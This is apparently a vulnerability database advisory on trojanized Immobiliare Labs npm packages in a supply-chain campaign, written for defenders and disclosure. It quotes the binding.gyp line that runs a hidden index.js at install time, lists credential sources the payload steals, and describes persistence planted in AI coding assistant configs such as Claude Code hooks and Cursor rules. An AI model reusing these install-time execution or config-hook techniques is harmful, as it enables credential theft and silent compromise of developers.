VDB
GCVE-110-OSM-2026-6699
GCVE-110-OSM-2026-6699
Advisory PublishedCVSS 9.6/10
Multiple versions of @immobiliarelabs/backstage-plugin-ldap-auth-backend were trojanized as part of the Miasma campaign, published within a 30-second window on 2026-06-26. The attack affected all four npm packages maintained by Immobiliare Labs simultaneously — @immobiliarelabs/backstage-plugin-gitlab, @immobiliarelabs/backstage-plugin-gitlab-backend, @immobiliarelabs/backstage-plugin-ldap-auth, @immobiliarelabs/backstage-plugin-ldap-auth-backend — with malicious patch versions inserted into every supported major release series across all four packages at once, indicating an account-level compromise of the Immobiliare Labs npm publisher rather than a single package takeover. The attack follows the same pattern as the mass supply chain attack on leo-platform packages previously documented by StepSecurity: simultaneous publication of malicious patch versions across all supported release series. Each compromised version contains a 5 MB index.js absent from all prior releases and a new binding.gyp that causes node-gyp to execute the payload during installation — a technique not caught by tools that only monitor scripts.postinstall in package.json. The payload steals credentials from a broad range of sources and attempts to persist inside AI coding assistant configurations. Reported to Immobiliare Labs via GitHub issue #1052 on 2026-06-26.
**Execution vector**
`binding.gyp` shell expansion via node-gyp — `"sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]` — bypasses postinstall script detection.
**Obfuscation (3 layers)**
- ROT-2 Caesar cipher wrapping the full payload in a `try { eval(...) }` block
- AES-128-GCM decryption of two embedded ciphertext blobs using hardcoded keys: first blob (`_b`) decrypts to a Bun runtime downloader, second blob (`_p`) decrypts to the main credential-harvesting payload
- obfuscator.io string table rotation on the main payload with a secondary encryption layer on the most sensitive strings
**Second-stage runtime**
Downloads Bun v1.3.13 from `hxxps://github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-<os>-<arch>.zip`, writes the decrypted payload to a randomly named temporary file, executes it using Bun, then deletes the file. Bun is used specifically to evade Node.js `--require` hook-based security monitoring.
**Credential targets**
- GitHub tokens (PATs, GitHub App JWTs, OIDC tokens, runner tokens)
- GitHub Actions masked secrets via `/proc/<pid>/mem` read of the Runner.Worker process
- AWS credentials (env vars, IMDS at 169[.]254[.]169[.]254, ECS task metadata at 169[.]254[.]170[.]2, SSM Parameter Store, Secrets Manager)
- Google Cloud Platform service account credentials
- Azure managed identity, service principal, and Key Vault credentials
- Kubernetes service account tokens and namespace secrets
- HashiCorp Vault tokens (file paths `/home/runner/.vault-token`, `/root/.vault-token`, `/run/secrets/VAULT_TOKEN`)
- npm, PyPI, RubyGems, and JFrog Artifactory tokens
- Password manager databases (Bitwarden, 1Password, gopass)
- SSH keys (`.ssh/`)
**Persistence — infectHost function**
Modifies AI coding assistant configs to establish persistence:
- Claude Code: `.claude/settings.json` (SessionStart hook)
- GitHub Copilot: `.github/copilot-instructions.md`
- Cursor: `.cursor/rules/setup.mdc`
- VS Code: `.vscode/tasks.json` (folderOpen trigger)
- Aider: `.aider.conf.yml`
- Also targets: Amazon Kiro, Sourcegraph Cody, Google Gemini, OpenAI Codex
**Worm propagation**
Functions by name: `squatPackage`, `updateTarball`, `handleNpmTokens`, `handlePypiTokens` — suggest ability to publish modified packages to npm and PyPI using stolen registry credentials.
**Network indicators**
- `hxxps://github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-<os>-<arch>.zip`
**File indicators**
- `index.js` (5 MB) in package root — present in compromised versions only; absent from all prior releases
- `binding.gyp` in package root — present in compromised versions only; triggers payload via node-gyp
- Tarball SHA512 (gitlab@2.1.2): `sha512-k7pGY+wScfqX51fpF412dOze6kSIytHYwZAXPhu6pDV+R7JWnD98Uc0nzGVHFead99nwWU4x56fkre/jH3Q7Xg==`
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @immobiliarelabs/backstage-plugin-ldap-auth-backend | — | — |
Aliases
References
Browse GCVE Records
73,393 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.